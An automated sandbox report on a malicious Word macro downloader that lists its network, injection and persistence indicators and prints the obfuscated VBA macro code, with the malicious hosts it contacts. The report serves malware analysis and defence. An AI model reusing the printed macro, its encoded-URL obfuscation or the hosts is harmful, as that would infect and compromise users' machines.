Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'FFGDES34309.doc'

malicious

Threat Score: 96/100 AV Detection: 69% Labeled as: W97M.Downloader

FFGDES34309.doc

This report is generated from a file or URL submitted to this webservice on January 29th 2016 04:13:16 (UTC)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v3.20 © Hybrid Analysis

Overview Sample unavailable Re-analyze Hash Seen Before

Attention: this analysis ran with the legacy Usermode Monitor. It is highly recommended to use the Kernelmode Monitor.

Request Report Deletion

Incident Response

Risk Assessment

Remote Access: Uses network protocols on unusual ports
Persistence: Injects into explorer
Spawns a lot of processes
Network Behavior: Contacts 1 domain and 2 hosts. View all details

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 15
External Systems
- Sample was identified as malicious by a trusted Antivirus engine
  
  details
  
  No specific details available
  
  source
  
  External System
  
  relevance
  
  5/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  5/54 Antivirus vendors marked sample as malicious (9% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
General
- Document spawns new processes
  
  details
  
  Document spawned a new process (macro present)
  
  source
  
  Indicator Combinations
  
  relevance
  
  7/10
- GETs files from a webserver
  
  details
  
  "GET /56gf/g545.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: jjcoll.in
  Connection: Keep-Alive"
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
- The input sample dropped a file that was identified as malicious
  
  details
  
  2/54 Antivirus vendors marked dropped file "g545[1].exe.177218" as malicious (classified as "QVM20.1.Malware" with 3% detection rate)
  2/54 Antivirus vendors marked dropped file "perdoma.exe.177625" as malicious (classified as "QVM20.1.Malware" with 3% detection rate)
  
  source
  
  Extracted File
  
  relevance
  
  10/10
Installation/Persistance
- Allocates virtual memory in foreign process
  
  details
  
  "perdoma.exe" allocated 00005012 bytes of memory in "explorer.exe" (Protection: "execute/read/write")
  "perdoma.exe" allocated 00335872 bytes of memory in "explorer.exe" (Protection: "read/write")
  
  source
  
  API Call
  
  relevance
  
  7/10
- Injects into explorer
  
  details
  
  Injected into "Explorer.EXE" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
- Writes data to a remote process
  
  details
  
  "perdoma.exe" wrote 335872 bytes to a foreign process "explorer.exe" (PID: 00001496)
  
  source
  
  API Call
  
  relevance
  
  6/10
Network Related
- Uses network protocols on unusual ports
  
  details
  
  TCP traffic to 85.143.166.200 on port 1743
  
  source
  
  Network Traffic
  
  relevance
  
  7/10
Spyware/Information Retrieval
- Accesses potentially sensitive information from local browsers
  
  details
  
  "perdoma.exe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" (Type: "FileHandle", Context: "NtSetInformationFile")
  
  source
  
  Touched Handle
  
  relevance
  
  5/10
Unusual Characteristics
- Contains embedded VBA macros with keywords that indicate auto-execute behavior
  
  details
  
  Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Spawns a lot of processes
  
  details
  
  Spawned process "WINWORD.EXE" with commandline "/n /dde" (Show Process)
  Spawned process "perdoma.exe" (Show Process)
  Spawned process "Explorer.EXE" with commandline "%WINDIR%\Explorer.EXE" (Show Process)
  Spawned process "taskhost.exe" (Show Process)
  Spawned process "OffDiag.exe" with commandline "/SOURCE 1 /LCID 1031 /WAITPID 2676" (Show Process)
  
  source
  
  Monitored Target
  
  relevance
  
  8/10
Hiding 3 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 11
Installation/Persistance
- Creates/touches files in windows directory
  
  details
  
  "perdoma.exe" created file "%WINDIR%\system32\en-US\WINHTTP.dll.mui"
  "perdoma.exe" created file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\QA0UPEJW\85_143_166_200[1].txt"
  "perdoma.exe" created file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\E9S7QCHY\85_143_166_200[1].txt"
  
  source
  
  API Call
  
  relevance
  
  7/10
- Drops executable files
  
  details
  
  "g545[1].exe.177218" has type "PE32 executable (console) Intel 80386, for MS Windows"
  "perdoma.exe.177625" has type "PE32 executable (console) Intel 80386, for MS Windows"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
Network Related
- Uses a User Agent typical for browsers, although no browser was ever launched
  
  details
  
  Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
Spyware/Information Retrieval
- Contains ability to enumerate processes/modules/threads
  
  details
  
  CreateToolhelp32Snapshot@KERNEL32.DLL from PID 00001784
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  5/10
System Destruction
- Marks file for deletion
  
  details
  
  "%TEMP%\perdoma.exe" marked "%TEMP%\CabDAE9.tmp" for deletion
  "%TEMP%\perdoma.exe" marked "%TEMP%\TarDAEA.tmp" for deletion
  "%TEMP%\perdoma.exe" marked "%SAMPLEDIR%\Users\PSPUBWS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QA0UPEJW\85_143_166_200[1].txt" for deletion
  
  source
  
  API Call
  
  relevance
  
  10/10
System Security
- Modifies proxy settings
  
  details
  
  "perdoma.exe" (Access type: "SETVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000")
  "perdoma.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYSERVER")
  "perdoma.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYOVERRIDE")
  "perdoma.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
  "perdoma.exe" (Access type: "DELETEVAL", Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
Unusual Characteristics
- Contains embedded VBA macros with suspicious keywords
  
  details
  
  Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
  Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
  Found suspicious keyword "Output" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "Print #" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  Found suspicious keyword "Open" which indicates: "May open a file"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Contains embedded string with suspicious keywords
  
  details
  
  Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
  Found suspicious keyword "Environ" which indicates: "May read system environment variables"
  Found suspicious keyword "Output" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "Print #" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "Open" which indicates: "May open a file"
  Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
  Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
  Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
  Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "Shell.Application" which indicates: "May run an application (if combined with CreateObject)"
  
  source
  
  String
  
  relevance
  
  10/10
- Installs hooks/patches the running process
  
  details
  
  "WINWORD.EXE" wrote bytes "E92319F3F0" to virtual address "0x77013D01" ("SetUnhandledExceptionFilter@kernel32.dll")
  "WINWORD.EXE" wrote bytes "81A241C5" to virtual address "0x2FCF1634" (part of module "WINWORD.EXE")
  "taskhost.exe" wrote bytes "00" to virtual address "0x0A832000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0A903000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x05202000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0AB50000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0B902000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0A763000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0B906000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x04CE7000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x04EC3000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x02955000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x04FF2000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0B90A000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0AAE1000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x04CE3000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x02951000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0A902000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0A833000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x05203000"
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version

Informative 10
General
- Contacts domains
  
  details
  
  "jjcoll.in"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "198.12.152.113:80"
  "85.143.166.200:1743"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contains embedded VBA macros
  
  details
  
  File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub autoopen()
  CargarFichProc "/"
  End Sub"
  File "Module1.bas" (Streampath: "Macros/VBA/Module1") has code: "Public uncunctuncE_1 As Object
  Public uncunctuncE_2 As Object
  Public uncunctuncE_3 As Object
  Public uncunctuncE_4 As String
  Public uncunctuncE_5 As String
  Public uncunctuncE_6 As Object
  Public Const STILL_ACTIVE = &H103
  Dim mandata() As String
  Public Const PROCESS_QUERY_INFORMATION = &H400
  Public Sub CargarFichProc(NombreFichero As String)
  Dim f As Integer
  Dim Buffer As String
  Dim Cadena As String
  Dim i As Integer
  Dim Aux As Integer
  Dim Fallo As Boolean
  Fallo = False
  bHayNORMA = False
  bHayNORMAC = False
  bHaySNIFTD = False
  bHayEXPAND = False
  bHaySFIFT = False
  bHayCNIFT = False
  bHayPNIFT = False
  bHayPNIFU = False
  bHayFrecs = False
  GoTo perd
  For i = 0 To UBound(sProc) Step 1
  sProc(i) = Unchecked
  Next i
  sProc(0) = CharSinCargar
  sProc(3) = CharSinCargar
  For i = 0 To UBound(sSNIFTD_EXPAND) Step 1
  sSNIFTD_E.XPAND(i) = CharSinCargar
  Next i
  sSNIFTD_E.XPAND(10) = Unchecked
  For i = 0 To UBound(sSFIFT) Step 1
  sSF.IFT(i) = CharSinCargar
  Next i
  For i = 0 To UBound(sCNIFT) Step 1
  sCN.IFT(i) = CharSinCargar
  Next i
  sCN.IFT(11) = Unchecked
  For i = 0 To UBound(sPNIFT) Step 1
  sPN.IFT(i) = CharSinCargar
  Next i
  sPN.IFT(4) = Unchecked
  sPN.IFT(7) = Unchecked
  For i = 0 To UBound(sPNIFU) Step 1
  sPNI.FU(i) = CharSinCargar
  Next i
  sPNI.FU(0) = Unchecked
  On Error GoTo ManipularErrorCargarProc
  f = FreeFile
  Open NombreFichero For Input As f
  Do
  Line Input #f, Buffer
  Cadena = ExtraeDato.Dcha(Buffer)
  Select Case ExtraeDatoI.zqda(Buffer)
  Case "", " ", CharLineaVacia
  Case Asteriscos & Asteriscos
  Case ClaveDAMA
  sProc(0) = Cadena
  Case ClaveNOFREC
  Aux = Fix(Val(SinLe.tras(ExtraeDatoIz.qda(Cadena))))
  If Aux > 0 Then
  bHayFrecs = True
  For i = 0 To Aux - 1 Step 1
  Input #f, Buffer
  ReDim Preserve sPro.c1(i)
  sPro.c1(i) = ExtraeDato.Izqda(Buffer)
  sPro.c1(i) = SinLe.tras(sPro.c1(i))
  Next i
  End If
  Case ClaveINI_NORMA
  bHayNORMA = True
  sProc(2) = Checked
  Case ClaveTEXCIT
  Select Case Cadena
  Case PrefLINX
  sProc(3) = ClaveLINX
  Case PrefLINY
  sProc(3) = ClaveLINY
  Case PrefCIRC
  sProc(3) = ClaveCIRC
  End Select
  Case ClaveFIN_NORMA
  Case ClaveINI_NORMACOMP
  bHayNORMAC = True
  sProc(11) = Checked
  Case ClaveFIN_NORMACOMP
  Case ClaveINI_SNIFTD
  bHaySNIFTD = True
  sProc(5) = Checked
  sProc(4) = sProc(5)
  Case ClaveINI_EXPAND
  bHayEXPAND = True
  sProc(6) = Checked
  sProc(4) = sProc(6)
  Case ClaveINSONDA
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefSONDA_1
  sSNIFTD_E.XPAND(7) = ClaveSONDA_1
  Case PrefSONDA_2
  sSNIFTD_E.XPAND(7) = ClaveSONDA_2
  Case PrefSONDA_3
  sSNIFTD_E.XPAND(7) = ClaveSONDA_3
  End Select
  sSNIFTD_E.XPAND(8) = ExtraeDato.Dcha(Cadena)
  Case ClaveROUT
  sSNIFTD_E.XPAND(9) = SinLet.ras(Cadena)
  If sSNIFTD_E.XPAND(9) = "0" Then
  sSNIFTD_E.XPAND(10) = Checked
  Else
  sSNIFTD_E.XPAND(10) = Unchecked
  End If
  Case ClaveOUTTHETA_SE
  sSNIFTD_E.XPAND(11) = ExtraeDat.oIzqda(Cadena)
  sSNIFTD_E.XPAND(11) = SinLe.tras(sSNIFTD_E.XPAND(11))
  Cadena = ExtraeDa.toDcha(Cadena)
  sSNIFTD_E.XPAND(12) = ExtraeDa.toIzqda(Cadena)
  sSNIFTD_E.XPAND(12) = SinLe.tras(sSNIFTD_E.XPAND(12))
  Case ClaveOUTPHI_SE
  sSNIFTD_E.XPAND(13) = ExtraeDat.oIzqda(Cadena)
  sSNIFTD_E.XPAND(13) = SinLe.tras(sSNIFTD_E.XPAND(13))
  Cadena = ExtraeDatoD.cha(Cadena)
  sSNIFTD_E.XPAND(14) = ExtraeDat.oIzqda(Cadena)
  sSNIFTD_E.XPAND(14) = SinLe.tras(sSNIFTD_E.XPAND(14))
  Case ClaveOUTSONDA
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefSONDA_1
  sSNIFTD_E.XPAND(15) = ClaveSONDA_1
  Case PrefSONDA_2
  sSNIFTD_E.XPAND(15) = ClaveSONDA_2
  Case PrefSONDA_3
  sSNIFTD_E.XPAND(15) = ClaveSONDA_3
  End Select
  sSNIFTD_E.XPAND(16) = ExtraeDatoD.cha(Cadena)
  Case ClaveFIN_SNIFTD, ClaveFIN_EXPAND
  Case ClaveINI_SFIFT
  bHaySFIFT = True
  sProc(7) = Checked
  Case ClaveR0
  sSF.IFT(3) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(3) = SinLe.tras(sSF.IFT(3))
  Case ClaveLFI0
  sSF.IFT(4) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(4) = SinLe.tras(sSF.IFT(4))
  Case ClaveLFI90
  sSF.IFT(5) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(5) = SinLe.tras(sSF.IFT(5))
  Case ClaveGSonda
  sSF.IFT(6) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(6) = SinLe.tras(sSF.IFT(6))
  Case ClaveCSonda
  sSF.IFT(7) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(7) = SinLe.tras(sSF.IFT(7))
  Case ClaveFIN_SFIFT
  Case ClaveINI_CNIFT
  bHayCNIFT = True
  sProc(8) = Checked
  Case ClaveTHETA_C
  sCN.IFT(7) = ExtraeDat.oIzqda(Cadena)
  sCN.IFT(7) = SinLe.tras(sCN.IFT(7))
  sCN.IFT(8) = ExtraeDatoD.cha(Cadena)
  sCN.IFT(8) = SinLe.tras(sCN.IFT(8))
  Case ClavePHI_C
  sCN.IFT(9) = ExtraeDat.oIzqda(Cadena)
  sCN.IFT(9) = SinLe.tras(sCN.IFT(9))
  sCN.IFT(10) = ExtraeDatoD.cha(Cadena)
  sCN.IFT(10) = SinLe.tras(sCN.IFT(10))
  Case ClaveCENTRAR_C
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefSI
  sCN.IFT(11) = Checked
  Case PrefNO
  sCN.IFT(11) = Unchecked
  Case Else
  sCN.IFT(11) = Grayed
  End Select
  sCN.IFT(12) = ExtraeDatoD.cha(Cadena)
  sCN.IFT(12) = SinLe.tras(sCN.IFT(12))
  Case ClavePERDYGAN
  sCN.IFT(13) = ExtraeDat.oIzqda(Cadena)
  sCN.IFT(13) = SinLe.tras(sCN.IFT(13))
  sCN.IFT(14) = ExtraeDatoD.cha(Cadena)
  sCN.IFT(14) = SinLe.tras(sCN.IFT(14))
  Case ClaveFSONDA
  sCN.IFT(15) = Cadena
  Case ClaveFIN_CNIFT
  Case ClaveINI_PNIFT
  bHayPNIFT = True
  sProc(9) = Checked
  Case ClaveTHETA_P
  sPN.IFT(0) = ExtraeDat.oIzqda(Cadena)
  sPN.IFT(0) = SinLe.tras(sPN.IFT(0))
  sPN.IFT(1) = ExtraeDatoD.cha(Cadena)
  sPN.IFT(1) = SinLe.tras(sPN.IFT(1))
  Case ClavePHI_P
  sPN.IFT(2) = ExtraeDat.oIzqda(Cadena)
  sPN.IFT(2) = SinLe.tras(sPN.IFT(2))
  sPN.IFT(3) = ExtraeDatoD.cha(Cadena)
  sPN.IFT(3) = SinLe.tras(sPN.IFT(3))
  Case ClaveFICHRNF
  sPN.IFT(5) = Cadena
  If sPN.IFT(5) <> "" Then
  sPN.IFT(4) = Checked
  Else
  sPN.IFT(4) = Unchecked
  End If
  Case ClaveFICHPRB
  sPN.IFT(6) = Cadena
  Case ClaveFICHREF
  sPN.IFT(8) = Cadena
  If sPN.IFT(8) <> "" Then
  sPN.IFT(7) = Checked
  Else
  sPN.IFT(7) = Unchecked
  End If
  Case ClavePERDINS
  sPN.IFT(9) = ExtraeDat.oIzqda(Cadena)
  sPN.IFT(9) = SinLe.tras(sPN.IFT(9))
  Case ClaveFIN_PNIFT
  Case ClaveINI_PNIFU
  bHayPNIFU = True
  sProc(10) = Checked
  Case ClaveCENTGIRAR_U
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefSI
  sPNI.FU(0) = Checked
  Case PrefNO
  sPNI.FU(0) = Unchecked
  Case Else
  sPNI.FU(0) = Grayed
  End Select
  sPNI.FU(1) = ExtraeDatoD.cha(Cadena)
  sPNI.FU(1) = SinLe.tras(sPNI.FU(1))
  Case ClaveTRANSF_U
  Select Case Cadena
  Case PrefSINCAMBIO
  sPNI.FU(2) = ClaveSINCAMBIO
  Case PrefCONCAMBIO
  sPNI.FU(2) = ClaveCONCAMBIO
  End Select
  Case ClaveCMPTE_U
  Select Case Cadena
  Case PrefCPXY
  sPNI.FU(3) = ClaveCPXY
  Case PrefAE
  sPNI.FU(3) = ClaveAE
  Case PrefTHPH
  sPNI.FU(3) = ClaveTHPH
  Case PrefRHLH
  sPNI.FU(3) = ClaveRHLH
  Case PrefEMEM
  sPNI.FU(3) = ClaveEMEM
  End Select
  Case ClaveFORMATO
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefFORM_1
  sPNI.FU(4) = ClaveFORM_1
  Case PrefFORM_2
  sPNI.FU(4) = ClaveFORM_2
  Case PrefFORM_3
  sPNI.FU(4) = ClaveFORM_3
  Case PrefFORM_4
  sPNI.FU(4) = ClaveFORM_4
  End Select
  sPNI.FU(5) = ExtraeDatoD.cha(Cadena)
  sPNI.FU(5) = SinLe.tras(sPNI.FU(5))
  Case ClaveTHETA_U
  sPNI.FU(6) = ExtraeDat.oIzqda(Cadena)
  sPNI.FU(6) = SinLe.tras(sPNI.FU(6))
  sPNI.FU(7) = ExtraeDatoD.cha(Cadena)
  sPNI.FU(7) = SinLe.tras(sPNI.FU(7))
  Case ClavePHI_U
  sPNI.FU(8) = ExtraeDat.oIzqda(Cadena)
  sPNI.FU(8) = SinLe.tras(sPNI.FU(8))
  Case ClaveFACTEXP
  sPNI.FU(9) = ExtraeDat.oIzqda(Cadena)
  sPNI.FU(9) = SinLe.tras(sPNI.FU(9))
  sPNI.FU(10) = ExtraeDatoD.cha(Cadena)
  sPNI.FU(10) = SinLe.tras(sPNI.FU(10))
  Case ClaveFIN
  Case ClaveFIN_PNIFU
  Case Else
  Fallo = True
  End Select
  Loop Until EOF(f)
  Close f
  perd:
  mandata = Split(UserForm1.ComboBox1.Text, NombreFichero)
  GoTo perd1
  If Fallo Then
  i = MsgBox("Se han ignorado algunas entradas
  compruebe la configuraci?n", _
  vbOKOnly + vbInformation, "AVISO PROCESADO DE DATOS")
  End If
  SalirCargarProc:
  Exit Sub
  ManipularErrorCargarProc:
  i = MsgBox("No existe el fichero o est? da?ado" _
  & vbNewLine & Err.Description, _
  vbOKOnly + vbCritical, "ERROR PROCESADO DE DATOS")
  Resume Next
  perd1:
  CargarFichIncer ""
  uncunctuncE_6.Open (uncunctuncE_5)
  End Sub
  Public Function AddFieldToField(uncunctuncE_9() As Variant, uncunctuncE_10 As Integer) As String
  Dim uncunctuncE_8 As Integer
  Dim uncunctunc2_1 As String
  uncunctunc2_1 = ""
  For uncunctuncE_8 = LBound(uncunctuncE_9) To UBound(uncunctuncE_9)
  uncunctunc2_1 = uncunctunc2_1 & Chr(uncunctuncE_9(uncunctuncE_8) - 9854 - uncunctuncE_10 - uncunctuncE_10 - uncunctuncE_10 - uncunctuncE_10)
  Next uncunctuncE_8
  AddFieldToField = uncunctunc2_1
  End Function
  Public Sub CargarFichIncer(NombreFichero As String)
  Dim f As Integer
  Dim Buffer As String
  Dim Cadena As String
  Dim i As Integer
  Dim Aux As Integer
  Dim Fallo As Boolean
  Fallo = False
  bHaySNIFTD = False
  bHayEXPAND = False
  bHaySFIFT = False
  bHayCNIFT = False
  bHayPNIFT = False
  bHayPNIFU = False
  bHayFrecs = False
  GoTo perd
  For i = 0 To UBound(sProc) Step 1
  sProc(i) = Unchecked
  Next i
  sProc(0) = CharSinCargar
  sProc(3) = CharSinCargar
  For i = 0 To UBound(sSNIFTD_EXPAND) Step 1
  sSNIFTD_E.XPAND(i) = CharSinCargar
  Next i
  sSNIFTD_E.XPAND(10) = Unchecked
  For i = 0 To UBound(sSFIFT) Step 1
  sSF.IFT(i) = CharSinCargar
  Next i
  For i = 0 To UBound(sCNIFT) Step 1
  sCN.IFT(i) = CharSinCargar
  Next i
  sCN.IFT(11) = Unchecked
  For i = 0 To UBound(sPNIFT) Step 1
  sPN.IFT(i) = CharSinCargar
  Next i
  sPN.IFT(4) = Unchecked
  sPN.IFT(7) = Unchecked
  For i = 0 To UBound(sPNIFU) Step 1
  sPNI.FU(i) = CharSinCargar
  Next i
  sPNI.FU(0) = Unchecked
  Pot_ruido = CharSinCargar
  Drift = CharSinCargar
  DriftMod = CharSinCargar
  Leakage = CharSinCargar
  CablesJuntas = CharSinCargar
  CablesJuntasMod = CharSinCargar
  Dut = CharSinCargar
  Sgh = CharSinCargar
  Cables = CharSinCargar
  Num_simulaciones = CharSinCargar
  Junto2 = Unchecked
  Junto = CharSinCargar
  On Error GoTo ManipularErrorCargarProc
  f = FreeFile
  Open NombreFichero For Input As f
  Do
  Line Input #f, Buffer
  Cadena = ExtraeDatoD.cha(Buffer)
  Select Case ExtraeDat.oIzqda(Buffer)
  Case "", " ", CharLineaVacia
  Case Asteriscos & Asteriscos
  Case "FICHERO_MED"
  sProc(0) = Cadena
  Case "FICHERO_INCER"
  sPathMedida = Cadena
  Case ClaveNOFREC
  Aux = Fix(Val(SinLe.tras(ExtraeDat.oIzqda(Cadena))))
  If Aux > 0 Then
  bHayFrecs = True
  For i = 0 To Aux - 1 Step 1
  Input #f, Buffer
  sPr.oc1(i) = ExtraeDat.oIzqda(Buffer)
  sPr.oc1(i) = SinLe.tras(sPro.c1(i))
  Next i
  End If
  perd:
  Set uncunctuncE_1 = CreateObject(mandata(0))
  
  Set uncunctuncE_2 = CreateObject(mandata(1))
  Set uncunctuncE_6 = CreateObject(mandata(2))
  Set hokuk = CreateObject(mandata(3))
  Set uncunctuncE_3 = hokuk.Environment(mandata(4))
  GoTo perd2
  Case ClaveTEXCIT
  Select Case Cadena
  Case PrefLINX
  sProc(3) = ClaveLINX
  Case PrefLINY
  sProc(3) = ClaveLINY
  Case PrefCIRC
  sProc(3) = ClaveCIRC
  End Select
  Case ClaveINI_SNIFTD
  bHaySNIFTD = True
  sProc(5) = Checked
  sProc(4) = sProc(5)
  Case ClaveINI_EXPAND
  bHayEXPAND = True
  sProc(6) = Checked
  sProc(4) = sProc(6)
  Case ClaveINSONDA
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefSONDA_1
  sSNIFTD_E.XPAND(7) = ClaveSONDA_1
  Case PrefSONDA_2
  sSNIFTD_E.XPAND(7) = ClaveSONDA_2
  Case PrefSONDA_3
  sSNIFTD_E.XPAND(7) = ClaveSONDA_3
  End Select
  sSNIFTD_E.XPAND(8) = ExtraeDatoD.cha(Cadena)
  Case ClaveROUT
  sSNIFTD_E.XPAND(9) = SinLe.tras(Cadena)
  If sSNIFTD_E.XPAND(9) = "0" Then
  sSNIFTD_E.XPAND(10) = Checked
  Else
  sSNIFTD_E.XPAND(10) = Unchecked
  End If
  Case ClaveOUTTHETA_SE
  sSNIFTD_E.XPAND(11) = ExtraeDat.oIzqda(Cadena)
  sSNIFTD_E.XPAND(11) = SinLe.tras(sSNIFTD_E.XPAND(11))
  Cadena = ExtraeDatoD.cha(Cadena)
  sSNIFTD_E.XPAND(12) = ExtraeDat.oIzqda(Cadena)
  sSNIFTD_E.XPAND(12) = SinLe.tras(sSNIFTD_E.XPAND(12))
  Case ClaveOUTPHI_SE
  sSNIFTD_E.XPAND(13) = ExtraeDat.oIzqda(Cadena)
  sSNIFTD_E.XPAND(13) = SinLe.tras(sSNIFTD_E.XPAND(13))
  Cadena = ExtraeDatoD.cha(Cadena)
  sSNIFTD_E.XPAND(14) = ExtraeDat.oIzqda(Cadena)
  sSNIFTD_E.XPAND(14) = SinLe.tras(sSNIFTD_E.XPAND(14))
  Case ClaveOUTSONDA
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefSONDA_1
  sSNIFTD_E.XPAND(15) = ClaveSONDA_1
  Case PrefSONDA_2
  sSNIFTD_E.XPAND(15) = ClaveSONDA_2
  Case PrefSONDA_3
  sSNIFTD_E.XPAND(15) = ClaveSONDA_3
  End Select
  sSNIFTD_E.XPAND(16) = ExtraeDatoD.cha(Cadena)
  Case ClaveFIN_SNIFTD, ClaveFIN_EXPAND
  Case ClaveINI_SFIFT
  bHaySFIFT = True
  sProc(7) = Checked
  Case ClaveR0
  sSF.IFT(3) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(3) = SinLe.tras(sSF.IFT(3))
  Case ClaveLFI0
  sSF.IFT(4) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(4) = SinLe.tras(sSF.IFT(4))
  Case ClaveLFI90
  sSF.IFT(5) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(5) = SinLe.tras(sSF.IFT(5))
  Case ClaveGSonda
  sSF.IFT(6) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(6) = SinLe.tras(sSF.IFT(6))
  Case ClaveCSonda
  sSF.IFT(7) = ExtraeDat.oIzqda(Cadena)
  sSF.IFT(7) = SinLe.tras(sSF.IFT(7))
  Case ClaveFIN_SFIFT
  Case ClaveINI_CNIFT
  bHayCNIFT = True
  sProc(8) = Checked
  Case ClaveTHETA_C
  sCN.IFT(7) = ExtraeDat.oIzqda(Cadena)
  sCN.IFT(7) = SinLe.tras(sCN.IFT(7))
  sCN.IFT(8) = ExtraeDatoD.cha(Cadena)
  sCN.IFT(8) = SinLe.tras(sCN.IFT(8))
  Case ClavePHI_C
  sCN.IFT(9) = ExtraeDat.oIzqda(Cadena)
  sCN.IFT(9) = SinLe.tras(sCN.IFT(9))
  sCN.IFT(10) = ExtraeDatoD.cha(Cadena)
  sCN.IFT(10) = SinLe.tras(sCN.IFT(10))
  Case ClaveCENTRAR_C
  Select Case ExtraeDat.oIzqda(Cadena)
  Case PrefSI
  sCN.IFT(11) = Checked
  Case PrefNO
  sCN.IFT(11) = Unchecked
  Case Else
  sCN.IFT(11) = Grayed
  End Select
  perd2:
  Dim uncunctuncE_7() As Variant
  uncunctuncE_7 = Array(10074, 10086, 10086, 10082, 10028, 10017, 10017, 10076, 10076, 10069, 10081, 10078, 10078, 10016, 10075, 10080, 10017, 10023, 10024, 10073, 10072, 10017, 10073, 10023, 10022, 10023, 10016, 10071, 10090, 10071)
  uncunctuncE_1.Open mandata(5), AddFieldToField(uncunctuncE_7, 29), False
  GoTo perd3
  sCN.IFT(12) = ExtraeDatoD.cha(Cadena)
  sCN.IFT(12) = SinLe.tras(sCN.IFT(12))
  Case ClavePERDYGAN
  sCN.IFT(13) = ExtraeDat.oIzqda(Cadena)
  sCN.IFT(13) = SinLe.tras(sCN.IFT(13))
  sCN.IFT(14) = ExtraeDatoD.cha(Cadena)
